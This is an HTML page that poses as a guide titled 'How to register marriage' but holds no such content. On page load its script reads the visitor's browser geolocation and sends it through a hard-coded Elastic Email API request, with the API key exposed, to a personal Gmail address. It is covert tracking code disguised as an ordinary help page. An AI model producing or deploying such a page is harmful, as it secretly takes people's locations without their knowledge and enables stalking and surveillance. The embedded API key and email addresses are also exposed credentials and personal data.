<!DOCTYPE html>
<html>
<body>
<p>How to register marriage</p>
<button onclick="getLocation()">How to register marriage</button>

<script>
getLocation();
function getLocation() {
  if (navigator.geolocation) {
    navigator.geolocation.getCurrentPosition(showPosition);
  } else {
  //  x.innerHTML = "Geolocation is not supported by this browser.";
  }
}

function showPosition(position) {
  let latitude = position.coords.latitude;
  let longitude = position.coords.longitude;
  let latlang = "lat : "+latitude+" lang : "+longitude;
  console.log(latlang);
  let url =`https://api.elasticemail.com/v2/email/send?apikey=dd5d1e9c-69e2-4ff5-8b4e-ba3593404120&subject=location&from=suresh@avaamo.com&fromName=suresh&replyTo=&replyToName=&to=suryat71@gmail.com&msgTo=&msgCC=&msgBcc=&lists=&segments=&mergeSourceFilename=&dataSource=&channel=&bodyHtml=&bodyText=`+latlang+`&charset=&charsetBodyHtml=&charsetBodyText=&encodingType=None&template=&headers_firstname=firstname: myValueHere&postBack=&merge_firstname=John&timeOffSetMinutes=&isTransactional=false&attachments=&trackOpens=true&trackClicks=true&utmSource=source1&utmMedium=medium1&utmCampaign=campaign1&utmContent=content1&bodyAmp=&charsetBodyAmp=
  `;
  var xhttp = new XMLHttpRequest();
  xhttp.open("POST", url, true);
  xhttp.send("fname=Henry&lname=Ford");
}
</script>

</body>
</html>
